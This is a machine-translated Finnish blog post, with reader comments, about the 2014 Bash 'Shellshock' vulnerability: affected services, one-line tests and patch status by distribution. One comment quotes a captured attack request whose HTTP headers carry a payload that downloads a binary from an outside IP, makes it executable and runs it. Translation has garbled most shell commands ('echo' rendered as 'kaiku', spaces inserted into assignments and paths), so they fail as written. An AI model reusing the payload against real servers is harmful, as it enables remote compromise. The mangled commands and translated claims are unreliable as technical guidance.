Bash: uusi haavoittuvuus havaittu (ja korjattu)

Joissakin blogeissa se toimii kuin kulo, tarina julkaistu turvallisuusblogi de Red Hat Bashissa löydetystä haavoittuvuudesta globaalien muuttujien väärinkäytön vuoksi. Alkuperäisten uutisten mukaan:

"... Haavoittuvuus johtuu siitä, että voit luoda ympäristömuuttujia erityisesti muotoilluilla arvoilla ennen kuin soitat bash-kuoreen. Nämä muuttujat voivat sisältää koodia, joka suoritetaan heti, kun kuori käynnistetään. Näiden muuttujien nimillä ei ole merkitystä, vain niiden sisällöllä. Tämän seurauksena tämä haavoittuvuus paljastuu monissa yhteyksissä, esimerkiksi:

  • ForceCommand sitä käytetään sshd-kokoonpanoissa rajoitettujen komentojen suorittamisominaisuuksien tarjoamiseksi etäkäyttäjille. Tätä vikaa voidaan käyttää tämän välttämiseksi ja komentojen mielivaltaisen suorittamisen aikaansaamiseksi. Jotkut Git- ja Subversion-toteutukset käyttävät tällaisia ​​rajoitettuja kuoria. Tämä ei vaikuta OpenSSH: n säännölliseen käyttöön, koska käyttäjillä on jo pääsy konsoliin.
  • Tämä vaikuttaa Apache-palvelimeen, joka käyttää mod_cgi- tai mod_cgid-toimintoa, jos CGI-komentosarjat kirjoitetaan sekä bash- että spawn-alatasoilla. Tällaisia ​​alatasoja käyttää implisiittisesti järjestelmä / popen C: ssä, os.system / os.popen Pythonissa, jos käytät system / exec-kuorta PHP: ssä (kun suoritetaan CGI-tilassa), ja open / system Perlissä (mikä riippuu komentosarjasta).
  • Mod_php: llä suoritetut PHP-skriptit eivät vaikuta edes alatasoilla.
  • DHCP-asiakkaat käyttävät shell-komentosarjoja järjestelmän konfiguroimiseksi, ja arvot otetaan mahdollisesti haitalliselta palvelimelta. Tämä mahdollistaisi mielivaltaisten komentojen suorittamisen, yleensä juurina, DHCP-asiakaslaitteella.
  • Erilaiset SUID-oikeuksilla varustetut demonit ja ohjelmat voivat suorittaa komentosarjat käyttäjän asettamien / vaikuttamien ympäristömuuttuja-arvojen avulla, jolloin mielivaltaiset komennot voidaan suorittaa.
  • Mikä tahansa muu sovellus, joka kiinnittää komentotulkin tai suorittaa komentosarjan komentosarjan, kuten bashin käyttäminen tulkkina. Shell-komentosarjat, jotka eivät vie muuttujia, eivät ole alttiita tälle ongelmalle, vaikka ne käsittelisivät epäluotettavaa sisältöä ja tallentavat sen kuorimuuttujat (vasen) ja alatasot auki.

... "

Kuinka tietää, onko Bashiin vaikuttanut?

Tämän vuoksi on hyvin yksinkertainen tapa tietää, koskeeko tämä haavoittuvuus meitä. Itse asiassa testasin Antergojani ja minulla ei ilmeisesti ole mitään ongelmaa. Meidän on avattava terminaali ja laitettava:

env x = '() {:;}; kaiku haavoittuva 'bash -c "kaiku tämä on testi"

Jos se tulee ulos tällä tavalla, meillä ei ole ongelmaa:

env x = '() {:;}; echo haavoittuva 'bash -c "kaiku tämä on testi" bash: varoitus: x: ohittaa funktion määrittelyyritys bash: virhe tuota funktion määritelmää x: lle tämä on testi

Jos tulos on erilainen, sinun on käytettävä ensisijaisten jakelumme päivityskanavia nähdäksesi, ovatko he jo asentaneet korjaustiedoston. Joten tiedät 😉

Päivitetty: Tämä on työtoverin ulostulo käyttäen Ubuntua 14:04:

env x = '() {:;}; kaiku haavoittuva 'bash -c "kaiku tämä on testi" haavoittuva tämä on testi

Kuten näette, toistaiseksi se on haavoittuva.


Jätä kommentti

Sähköpostiosoitettasi ei julkaista. Pakolliset kentät on merkitty *

*

*

  1. Vastuussa tiedoista: Miguel Ángel Gatón
  2. Tietojen tarkoitus: Roskapostin hallinta, kommenttien hallinta.
  3. Laillistaminen: Suostumuksesi
  4. Tietojen välittäminen: Tietoja ei luovuteta kolmansille osapuolille muutoin kuin lain nojalla.
  5. Tietojen varastointi: Occentus Networks (EU) isännöi tietokantaa
  6. Oikeudet: Voit milloin tahansa rajoittaa, palauttaa ja poistaa tietojasi.

  1.   Gerson dijo

    Minulla on Kubuntu 14.04 64: stä ja saan myös:

    env x = '() {:;}; kaiku haavoittuva 'bash -c "kaiku tämä on testi"
    haavoittuva
    Tämä on testi

    Olen jo päivittänyt, mutta se ei ole oikein. Mitä tehdä?

    1.    vilkas dijo

      Odota, että ne päivittyvät. Jo eOS esimerkiksi päivitetty .. 😀

    2.    Johannes dijo

      Kuinka outoa, minulla on myös Kubuntu 14.04

      $ env x = '() {:;}; kaiku haavoittuva 'bash -c "kaiku tämä on testi"
      bash: varoitus: x: ohittaa toiminnon määritysyrityksen
      bash: virhe tuotaessa funktion määritelmää x: lle
      Tämä on testi

      1.    Johannes dijo

        Lisään, että tänään ladatun "bash" -paketin versio on:
        4.3-7ubuntu1.1

        http://packages.ubuntu.com/trusty/bash

    3.    eliotime3000 dijo

      Minun tapauksessani komennon antaminen antaa minulle vain seuraavat terminaalissa:

      >

      Joka tapauksessa vitsi on se, että päivitin Debian Wheezyn ja se pudotti minut.

      1.    yukiteru dijo

        Wheezy on edelleen alttiina virheen toiselle osalle, ainakin iltapäiväksi (UTC -4: 30), ongelma oli edelleen seuraava: /

  2.   Petercheco dijo

    Vahvistin juuri, että päivityksen päivityksen jälkeen tänä aamuna Slackware, Debian ja Centos eivät vaikuta, koska he saivat vastaavan päivityksen.

    Mikä tekee Ubuntusta edelleen haavoittuvan tällä hetkellä? Ja kerro minulle, että se on turvallista: D.

    1.    Johannes dijo

      Mutta oletko yrittänyt päivittää Ubuntua?
      Tämän päivän päivityksen myötä he ovat myös korjanneet sen.

      1.    Petercheco dijo

        OK

    2.    Robet dijo

      Turvallisuusasiantuntijat varoittavat Bashin haavoittuvuudesta, se voi olla suurempi uhka Linux-ohjelmiston käyttäjille kuin Heartbleed-virhe, jossa hakkerit voivat hyödyntää Bashin virhettä hallitakseen järjestelmän kokonaan.
      Kyberturvallisuusyrityksen Rapid7: n insinööripäällikkö Tod Beardsley varoitti, että virhe oli luokiteltu 10 vakavuuden perusteella, mikä tarkoittaa, että sillä on suurin vaikutus, ja luokiteltu "matalaksi" hyödyntämisen monimutkaisuuden, mikä on suhteellisen helppoa hakkerihyökkäyksille. Tämän haavoittuvuuden avulla hyökkääjät voivat mahdollisesti hallita käyttöjärjestelmää, käyttää luottamuksellisia tietoja, tehdä muutoksia ja paljon muuta ", Beardsley kertoi. "Kaikkien, joilla on järjestelmät, jotka miehittävät Bashin, tulisi kiinnittää korjaustiedosto välittömästi", hän lisäsi.
      ENNEN TÄTÄ VAKAVUUTTA, JOKA ESITTÄÄ VANHAA TYÖKALUA (GNU), jossa Bachia isännöidään, Linux-ohjelmistolle olisi helpompaa päästä eroon GNU: sta ja vaihtaa BSD-työkalua.

      PS: ÄLÄ LUOKKAA sananvapauttani, ... ole loukannut ketään, ... älä poista viestiäni kuten edellinen viesti, jonka olen poistanut!

      1.    Xerix dijo

        Ole hyvä, älä liioittele sitä. Kuinka vihaan niitä ihmisiä, jotka käyttävät BSD: tä ja halveksivat GNU: ta, Linuxia tai mitä tahansa näistä projekteista.

      2.    Petercheco dijo

        Olen kanssasi ja olet täysin oikeassa tämän aukon vakavuudessa.

      3.    diatsepa dijo

        Se ei ollut sensuuria, se oli irtisanomisia (olit tehnyt saman kommentin gnome 3.14 -viestissä)

      4.    Henkilöstö dijo

        «… Ja luokiteltu '' MATALAKSI '' hyväksikäytön monimutkaisuudelle, mikä tarkoittaa, että se on suhteellisen HELPOSTI hakkereiden hyökkäyksille»

        Onko ristiriita havaittavissa?
        Kuinka haavoittuvuuden hyödyntäminen voi olla helppoa ja samalla riski "alhainen", koska sen käyttö on niin monimutkaista?
        Se on vika, joka on ratkaistu muutamassa tunnissa kokouksesta ja josta, kuten sydämestään, ei ole raportoitu siitä, että sitä olisi käytetty hyväksi (tietysti tällä on vähemmän aikaa tuntea toisensa).
        Se on enemmän tabloidlehteä kuin todellista riskiä.

      5.    Petercheco dijo

        Näyttääkö @Staff sinulle merkityksetöntä? Mitä kerrot minulle nyt?

        GET./.HTTP/1.0
        .Käyttäjä-agentti: .Kiitos-Rob
        .Cookie: (). {.:;.};. Wget.-O./tmp/besh.http://162.253.66.76/nginx; .chmod.777. / tmp / besh; ./ tmp / besh;
        .Host: (). {.:;.};. Wget.-O./tmp/besh.http://162.253.66.76/nginx; .chmod.777. / tmp / besh; ./ tmp / besh;
        Viite: (). {.:;.};. Wget.-O./tmp/besh.http://162.253.66.76/nginx; .chmod.777. / tmp / besh; ./ tmp / besh;
        Hyväksy:. * / *

        $ tiedosto nginx
        nginx: ELF 32-bittinen suoritettava LSB, Intel 80386, versio 1 (SYSV), staattisesti linkitetty, GNU / Linux 2.6.18: lle, poistettu

        $md5sum nginx
        5924bcc045bb7039f55c6ce29234e29a nginx

        $ sha256summa nginx
        73b0d95541c84965fa42c3e257bb349957b3be626dec9d55efcc6ebcba6fa489 nginx

        Tiedätkö mikä se on? Vähän vaarallista ...

      6.    yukiteru dijo

        Tilanne on melko vakava, mutta sieltä sanoa, että sinun pitäisi lopettaa bashin käyttö BSD-vaihtoehdoksi, se on jo yhtä paljon, päivitys on kuitenkin jo olemassa, kosketan vain päivitystä eikä mitään muuta.

        Nyt PD, mielestäni se on enemmän kollega @robet, en usko, että täällä olevat järjestelmänvalvojat ovat omistautuneet tällaisten kommenttien poistamiseen, koska kyllä, koska koska olen osallistunut tähän yhteisöön, minulla on ollut tunne ja toivon, että se pysyy niin.

        Tervehdys.

      7.    vilkas dijo

        Laitoit täsmälleen saman kommentin kahteen eri viestiin. Jos yrität mainostaa tarinan "lähdettä", anteeksi, tämä ei ole oikea paikka.

      8.    mario dijo

        Bash tulee Unixista (ja sen GNU-kloonista). Myös BSD-pohjaiset järjestelmät, kuten OSX, vaikuttavat, ja Genbetan mukaan he eivät ole vielä paikkaaneet sitä. Samoin Bashin käyttämiseen tarvitaan käyttäjätili, joko paikallinen tai SSH: n kautta.

      9.    yukiteru dijo

        @Työntekijä:

        1.- Se luokitellaan tasolle 10 (vaaran enimmäistaso) johtuen palvelumäärästä, johon vika voi vaikuttaa. Päähuomautuksessa he tekevät tämän tosiasian hyvin selväksi väittäen, että vika voi vaikuttaa palveluihin, kuten apache, sshd, ohjelmiin, joilla on suid-oikeudet (mm.

        2.- Se on luokiteltu alhaiseksi vaikeustasoksi, kun on kyse sen toteuttamisesta, ja paras esimerkki tästä on haavoittuvuustestiohjelma, jonka @elav on asettanut viestiin. Erittäin vaikea toteuttaa ei ole, kuten näette.

        En näe redundanssia tiedoissa (näen vain Google-käännöksen) ja jos ongelma on melko vakava, ja kuten sanot, sillä on jo korjaustiedosto ja ratkaisu, mutta ei sitä varten, se ei ole enää riski, ja aivan todellinen .

      10.    Henkilöstö dijo

        @petercheco / @Yukiteru

        Älä tulkitse minua väärin, mielestäni on selvää, että kritiikkini on uutinen, jonka Robet yhdistää ja keskittyy ristiriitaisuuteen eikä irtisanomiseen.

        Samalla tavalla meidän on tehtävä ero riskin ja vaaran välillä (en mainitse jälkimmäistä), käytämme niitä yleisesti synonyymeinä, mutta tässä vaara olisi virheen vahingoittumiskyky ja riski sen esiintymisen todennäköisyydelle.
        Minun tapauksessani tulin eilen. Se ei ollut postituslistoja tai vastaavaa varten, se oli tarkoitettu työpöydän jakelulle! Otin puhelimen ja lähetin viestin sysadminille, jossa oli linkki, ja vahvisti, että minulla on kaikki korjaustiedosto, anteeksi, mutta anteeksi, mutta nämä uutiset eivät pidä minua hereillä.

      11.    Robet dijo

        Muissa foorumeissa he mainitsevat Bash-haavoittuvuuden, "ratkaisun, jonka Debian ja Ubuntu julkaisivat", mutta tänään he havaitsivat, että heikkous on edelleen olemassa, joten ratkaisu oli puutteellinen, he mainitsevat sen!

        Katson, että monet ovat arvostelleet minua siitä yksinkertaisesta tosiasiasta, että estän ihmisiä haavoittuvuuden vakavuudesta - joka on luokiteltu maksimaalisen vaarallisuuden tasolle 10, ja mainitsee mahdolliset ratkaisut Linux-ohjelmistoille ennen vanhentunutta GNU-työkalua, jossa Bash isännöi - mikä täysin GNU voisi korvata Linux-ohjelmiston BSD-työkalulla,… käytän myös Linuxia ja pidän Linuxista!

        Selvennän, että Bashia ei ole oletusarvoisesti asennettu BSD: hen, se on vielä yksi Linux-yhteensopivuuspaketti, joka voidaan asentaa BSD: hen ... kyllä! Lähde on asetettu niin, että he voivat tarkistaa uutiset, koska monet käyttäjät eivät joskus usko viestiä tai kommentteja.

        1.    vilkas dijo

          robet: Kuten he kertoivat sinulle jo uudestaan ​​ja uudestaan, olet jo lisännyt kommenttisi uutisten kanssa viestiin, sinun ei tarvitse laittaa sitä kaikkiin kommentteihisi.

          Bashissa on muita kuoria, joita voidaan käyttää, jos Bash on haavoittuva. 😉

      12.    mario dijo

        Robet, että tiedän, ettei ole mitään ohjelmistoa, joka yhdistää linux-ytimen BSD-käyttömaan kanssa. Lähin asia on päinvastoin, kBSD + GNU, kuten Gentoo ja Debian tekevät. Lisäksi GNU: ta (1983) ei voida kutsua "vanhanaikaiseksi", jos se on BSD: n (1977) jälkeen. He molemmat jakavat unix-juurensa (mutta eivät koodia), "Linux-yhteensopivuutta" ei olisi, jos Bash luotiin Linus T: n ollessa vielä lapsi.

  3.   manuelperez dijo

    ui, debian-testaus on tällä hetkellä "haavoittuva" mikä putki meillä on ...

    1.    mrcelhw dijo

      Käytän Debian-testausta ja jopa tässä haarassa olemme saaneet bash-päivityksen

  4.   diatsepa dijo

    genbetan mukaan on myös toinen haavoittuvuus
    http://seclists.org/oss-sec/2014/q3/685

    käsky kuulla on
    env X = '() {(a) => \' sh -c "kaiun haavoittuvuus"; bash -c "kaiun epäonnistuminen 2 unspatched"

    1.    vilkas dijo
      env X = '() {(a) => \' sh -c "kaiun haavoittuvuus"; bash -c "echo Unpatched Failure 2" sh: X: rivi 1: syntaktinen virhe odottamattoman elementin läheisyydessä `= 'sh: X: rivi 1:` `sh: virhe tuodessa funktion määritelmää X: lle sh - Haavoittuva - Virheen 2 vastaamatonta komentoa ei löydy
      
      1.    diatsepa dijo

        sama minä.

      2.    Giskard dijo

        Sama täällä. Mutta viestin alkuperäinen vika korjattiin (L) Ubuntu 14.04: ssä

      3.    x11tete11x dijo

        Sen sijaan, että yritän suorittaa yksinkertaisen kaikun, jotta se toteuttaisi käyttöoikeuksia vaativan käskyn, heitän "riittämättömät oikeudet" ... tämä vika ei lisää oikeuksia? Jos se ei lisää oikeuksia, se ei ole niin vaarallinen kuin ne maalataan.

      4.    Xurxo dijo

        Olet oikeassa!! ne olivat kaksi haavoittuvuutta ...

        Minulle Linux Mint 17: ssä toisen bash-päivityksen jälkeen, jonka he asettivat Ubuntun tietovarastoihin viime yönä, kun komento suoritetaan, shell tarjoaa tämän lähdön:

        env X = '() {(a) => \' sh -c "kaiun haavoittuvuus"; bash -c "echo Fail 2 unpatched"
        >

        Bassh-versio, joka laitettiin Ubuntun tietovarastoihin päivittämään edelliset, on:

        4.3-7ubuntu1.2

        Debian-johdetuissa järjestelmissä voit tarkistaa asennetun version tällä komennolla:

        dpkg -s bash | grep -versio

        Joka tapauksessa se on selvitettävä ainakin Debianin, Ubuntu ja Mint -käyttäjille; Sinun ei pitäisi huolehtia liikaa ohjelmista, jotka suorittavat komentosarjoja #! / Bin / sh -otsakkeella, koska niissä jakeluissa bin / sh ei kutsu "bash", mutta sitoutuu kuoreen "viiva" (viiva on :)

        Debianin alkemistikonsoli (viiva) on johdettu POSIX-konsoli
        tuhkaa.
        .
        Koska se suorittaa komentosarjoja nopeammin kuin bash, ja sillä on vähemmän riippuvuuksia
        - kirjastoista (mikä tekee siitä vankemman ohjelmistohäiriöitä tai
        laitteisto), sitä käytetään järjestelmän oletuskonsolina
        Debian.

        Joten, ainakin Ubuntussa, "bash" käytetään kuorena käyttäjän kirjautumiselle (myös pääkäyttäjälle). Mutta kuka tahansa käyttäjä voi käyttää oletuksena toista kuorta käyttäjälle ja juurikonsoleille (päätelaitteille).

        On helppo tarkistaa, että komentotulkki suorittaa komentosarjat (#! / Bin / sh) suorittamalla nämä komennot:

        tiedosto / bin / sh
        (lähtö on / bin / sh: symbolinen linkki viivaan) seuraamme jälkeä toistamalla komennon

        tiedosto / bin / viiva
        (lähtö on / bin / dash: ELF 64-bittinen jaettu LSB-objekti, x86-64, versio 1 (SYSV), joten tämä on suoritettava tiedosto.

        Nämä ovat tulokset Linux Mint 17. -jakelusta. Muissa muissa kuin Ubuntu / Debian-pohjaisissa jakeluissa ne voivat olla erilaisia.

        Oletuskuoren vaihtaminen ei ole vaikeaa! Voit jopa käyttää eri käyttäjille ja pääkäyttäjille. Itse asiassa sinun tarvitsee vain asentaa haluamasi kuori ja muuttaa oletusarvo komennolla "chsh" tai muokkaamalla tiedostoa / etc / passwd (vaikka käyttäjät, jotka eivät tiedä virheen seurauksia "passwd" -tiedostoa muokattaessa, on Parempi ilmoittaa itsellesi hyvin ja tehdä kopio alkuperäisestä ennen sen muokkaamista, jos se on tarpeen palauttaa).

        Minusta tuntuu mukavammalta "tcsh" (tcsh on :)

        TENEX C -konsoli, parannettu versio Berkeley csh: stä

        "Csh" on se, mitä Mac OS X käytti muutama vuosi sitten. Mikä on järkevää, kun otetaan huomioon, että suuri osa Applen käyttöjärjestelmästä on FreeBSD-koodi. Nyt eilen lukemastani näyttää siltä, ​​että ne tarjoavat myös "bash" käyttäjän päätelaitteille.

        PÄÄTELMÄT:

        - Korjatut "bash" -versiot eniten käytettyihin jakeluihin "on jo jaettu
        - "bash" 4.3-7ubuntu1.2: n ja uudempien versio ei sisällä näitä vikoja
        - "bash" -toiminnon käyttö ei ole pakollista OS * Linuxissa
        - Muutama * Linux-jakelulinkki linkittää #! / Bin / sh ja "bash"
        - On olemassa vaihtoehtoja: tuhka, viiva, csh, tcsh ja jotkut muut
        - Ei ole monimutkaista muuttaa oletuskuorta, jonka järjestelmä kutsuu avattaessa päätelaitteen
        - Harvat pienet laitteet (reitittimet ja muut) käyttävät "bash", koska se on erittäin iso!

      5.    Xurxo dijo

        Juuri nyt on saapunut uusi päivitys, joka asentaa toisen version "bash" 4.3-7ubuntu1.3

        Linux Mint 17 ja Ubuntu 14.04.1 LTS

        1.    vilkas dijo

          ArchLinux tuli versioon bash-4.3.026-1

    2.    Robet dijo

      @ Xurxo… .csh Berkeleyltä?, ... Ymmärrät jotain siitä, mitä puhun yllä, ja on parempi käyttää BSD: n “csh”: ta ... sen vanhan GNU-työkalun sijaan, jossa Bash isännöi. Tämä työkalu on paras Linux-ohjelmistolle.

  5.   nimettömänä dijo

    Luulen, että tämä on vika

    https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=762760

    totta?

  6.   Gonzalo dijo

    Ja mikä olisi ratkaisu?

    1.    vilkas dijo

      Odota, että he päivittävät pakettisi distroosi 😉

  7.   Paul Ivan Correa dijo

    haavoittuva
    Tämä on testi

    Ei vielä korjaustiedostoa Ubuntu Studio 14.04: lle

    1.    Häive dijo

      Korjattu Ubuntu Studio 14.04.1: ssä
      wisp @ ubuntustudio: ~ $ env x = '() {:;}; kaiku haavoittuva 'bash -c "kaiku tämä on testi"
      bash: varoitus: x: ohittaa toiminnon määritysyrityksen
      bash: virhe tuotaessa funktion määritelmää x: lle
      Tämä on testi

  8.   tienkuljettaja dijo

    Itse asiassa se on pieni haavoittuvuus, jos se vaikuttaa sinuun, se on, että teit jotain väärin aiemmin ...

    Koska juurioikeuksilla suoritettavaa bash-komentosarjaa ei pitäisi koskaan altistaa käyttäjälle. Ja jos hän juoksee ilman etuoikeuksia, tällaista pullistuvuutta ei ole. Itse asiassa se on hölynpölyä. Paljon pelottavaa.

    1.    Xerix dijo

      Olen samaa mieltä.

    2.    Henkilöstö dijo

      Nämä viat ovat hyviä, jos haluat myydä enemmän sanomalehtiä tai saada enemmän vierailuja.
      Mutta he unohtavat aina mainita, että jotta kompromissi tietokoneesta tällaisilla skripteillä, sinulla on ensin oltava pääsy bashiin ja sitten sen root.

      1.    Daryo dijo

        henkilökunta, jos käytät apache-ohjelmaa cgi: n kanssa, laita vain http-otsikot evästeiksi tai ohjaa suoritettava toiminto. Sitä on käytetty jopa matojen levittämiseen.

    3.    Daryo dijo

      ja jos joku laittaa kuoren palvelimelle wget mishell.php: llä, siinä tapauksessa se ei ole vakavaa, eikö niin?

    4.    eliotime3000 dijo

      Samaa mieltä kanssasi. Luulin, että se oli valtava vika kuin Heartbleedissä (jopa NSA lainasi itsensä polttoaineeksi sairastuvuuteen), mutta loppujen lopuksi se oli pieni virhe.

      On muitakin todella vakavia vikoja, kuten Flashin hullu kulutus ja Pepper Flash Playerin suorituskyvyn heikkeneminen, ja joka on jo korjattu webRTC-vika Chromessa ja Firefoxissa.

  9.   sidemies dijo

    Tiedätkö, onko siinä järjestely ihmisille, joilla on Linux Mint 16?

  10.   oscar dijo

    Debianin testauksessa se oli jo korjattu.

  11.   yoyo dijo

    Viidessä distrossani se on ratkaistu, OS X: ssäni en tiedä.

    Älä sensuroi kommenttini, sanoin OS X. En tiedä, voitko sanoa OS X: n tällä sivustolla.

    1.    tannhausser dijo

      @yoyo no, älä unohda sitä liikaa, että he työskentelevät edelleen joitain korjaustiedoston yksityiskohtia ... kokeile tätä ja kerro sitten miten XD: stä

      env x = '() {:;}; kaiku haavoittuva 'bash -c "kaiku Olen haavoittuvampi kuin iphone 6 roskakori"

      Jos he ovat ratkaisseet sen 100% ennen OS X: ää, lyön vetoa mistä tahansa

    2.    eliotime3000 dijo

      No, jopa Ars Technicassa, ne antavat merkityksen Bashille OSX: ssä.

    3.    vilkas dijo

      @Yoyo seuraava kommentti OS X: stä SPAM: lle .. lla tu save .. 😛

  12.   tannhausser dijo

    @yoyo korjata lainaukset ... mutta loput tiedät 😉

    1.    eliotime3000 dijo

      Kuten heistä olisi tullut holhoavia OSX: n kanssa (koska OSX käyttää edelleen Bash: v: ää).

      Joka tapauksessa minun ei tarvitse sekailla Debian Jessiea niin paljon.

  13.   elhui2 dijo

    Jos järjestelmä on haavoittuva Cent OS: ssä:
    puhdista kaikki && yum update bash

    nähdäksesi bash-version:
    rpm -qa | grep bash

    Jos versio on aikaisempi kuin bash-4.1.2-15.el6_5.1, järjestelmäsi voi olla haavoittuva!

    Tervehdys.

  14.   manuelperez dijo

    2. haavoittuvuutta ei ole vielä ratkaistu

    env amvariable2 = '() {(a) => \' sh -c "echo amVulnerable"; bash -c "kaiun epäonnistuminen 2 unspatched"

  15.   Jeesus Perales dijo

    Päivitetään ...

  16.   kytkin dijo

    Minulle tapahtuu Gentoon päinvastoin, olen vain altis ensimmäiselle epäonnistumiselle, mutta toisen saan tämän:
    [koodi] sh: X: rivi 1: syntaktinen virhe odottamattoman elementin lähellä = =
    sh: X: rivi 1: ''
    sh: virhe tuotaessa funktion määritelmää X: lle
    sh: haavoittuva: komentoa ei löydy
    Virhettä 2 ei korjata
    [/ Code]
    En tiedä, onko Bashista jo vakaa versio korjatuilla virheillä, mutta jompikumpi tapauksista odottaa seuraavaa kerta, kun teen emerge –sync && emerge –update –deep –with-bdeps = ja - newuse @world (näin päivitän koko järjestelmän).

    1.    yukiteru dijo

      Minulla on Gentoo versiolla 4.2_p50 ja toistaiseksi se on läpäissyt kaikki testit. Kokeile esiin tulemista –sync ja sitten emerge -av1 app-shells / bash ja tarkista sitten, että sinulla on versio 4.2_p50 käyttämällä komentoa bash –version.

  17.   Fer dijo

    Oletko kokeillut tätä?

    Uusien pakettien, uuden testin, jonka Red Hat tarjoaa meille

    cd / tmp; rm -f / tmp / kaiku; env 'x = () {(a) => \' bash -c "kaikupäivä"; kissa / tmp / kaiku

    Jos järjestelmämme ei ole haavoittuva ja se on korjattu oikein, sen on annettava meille jotain tällaista
    1-päivämäärä
    2 cat: / tmp / echo: Tiedostoa tai hakemistoa ei ole olemassa

  18.   yukiteru dijo

    Kokeile näin:

    env X = '() {(a) => \' sh -c "kaiun haavoittuvuus"; bash -c "kaiku epäonnistui 2 korjattu"

    saan

    haavoittuva
    Vika 2 korjattu.

    1.    yukiteru dijo

      Unohda se, viiva on huonosti muotoiltu.

  19.   oscar meza dijo

    Erinomainen! Tein jo päivityksen Slackware-laitteelleni, kiitos!

  20.   lotbrok dijo

    Hei, herää kysymys, minulla on useita palvelimia, joissa on 10-bittinen "SUSE Linux Enterprise Server 64".
    Kun suoritan komennot, jotka olen haavoittuva, olen jopa haavoittuvampi kuin iPhone 6 xD: n roskakori
    Jos en ole väärässä päivittämällä / asentamalla paketteja SUSE: ssa, se tehdään komennolla «zypper».

    Joillakin palvelimilla se kertoo minulle tämän:

    BIAL: ~ # vetoketju ylös
    -bash: zypper: komentoa ei löydy
    BIAL: ~ #

    Ja muissa tämä:

    PK: ~ # vetoketju ylös
    Palautetaan järjestelmän lähteitä ...
    Jäsennetään SUSE Linux Enterprise Server 10 SP2-20100319-161944 -metatietoja ...
    Jäsennetään RPM-tietokantaa ...
    Yhteenveto:
    Ei mitään tehtävää.

    Mitä teen?
    Tiedän, että joidenkin mielestä haavoittuvuus on pienempi kuin mitä he maalavat, mutta minulla on se, enkä halua altistua pienille tai suurille riskeille.

    Tervehdys.

  21.   Sanders gutierrez dijo

    Hyvää iltaa, olen yrittänyt liittää koodin, jonka annoit artikkelissa, saan tämän
    hiomakoneet @ pc-hiomakoneet: ~ $ env x = '() {:;}; kaiku haavoittuva 'bash -c "kaiku tämä on testi"
    Tämä on testi
    hiomakoneet @ pc-hiomakoneet: ~ $
    Selittäisittekö minulle, kuinka korjata korjaus, päivitän päivittäin ja en näe muutoksia kehotteen tuotoksessa.

    Kiitos paljon!